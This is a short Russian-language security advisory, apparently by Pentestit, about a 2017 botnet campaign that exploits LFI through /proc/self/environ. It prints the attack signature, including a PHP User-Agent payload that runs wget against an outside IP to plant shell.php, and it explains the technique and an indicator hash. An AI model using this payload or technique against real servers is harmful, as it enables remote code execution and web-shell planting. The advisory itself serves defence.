Системами мониторинга компании Pentestit зафиксирована атака ботов, нацеленная на эксплуатацию LFI уязвимости в веб-приложениях.

Сегодня, 29.09.17 зафиксирована атака на несколько защищаемых приложений с использованием бот-сети (IP-адреса атакующих принадлежат Франции, США, Сейшелам и т.д.).

Признак атаки:

Parameters: file=../../../../../proc/self/environ

User-agent: <?php system(‘wget «101.99.5.63/doh.txt?h=domain.ru&f=file» -O shell.php’);?>

Для эксплуатации используется хранилище переменных окружения /proc/self/environ. Когда происходит запрос любой php-страницы на сервере, создается новый процесс. В *nix-системах каждый процесс имеет свою собственную запись в /proc, а /proc/self, в свою очередь, – это статический путь и символическая ссылка, содержащая полезную информацию для последних процессов.

Если пейлоад попадет в /proc/self/environ, то можно запускать произвольные команды с помощью LFI. Поле User Agent подменяется на вредоносный пейлоад, скачивающий с 101.99.5.63 содержимое doh.txt в shell.php, в котором на данной момент содержится следующий код:

<?php
    echo md5("carbon");
    die();
?>

Возможно это просто индикатор заражения системы (функция вывода MD5 хеша слова «carbon») и в дальнейшем код будет заменен на что-то другое. По умолчанию часть /proc/self/environ, показывающая User Agent, выглядит примерно так:

PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin:/usr/bin:/bin

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36

В случае эксплуатации LFI он будет выглядеть так:

PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin:/usr/bin:/bin

<?php echo md5(«carbon»); die(); ?>

Также, находятся примеры немного обфусцированного кода пейлоада: http://ddecode.com/hexdecoder/?results=4851cdffb1a3fc963846dee3c750072e

В данный момент внедрения вредоносного пейлоада нет, но неизвестно, когда будет заменено содержимое файла. В User Agent подставляется значение атакованного домена, вероятно для того, чтобы позже обойти все домены и выявить признак возможности заражения хеш от слова carbon —  e1b832c8857262f1089376030b4298b3.

Использование Web Application Firewall позволяет блокировать подобные атаки.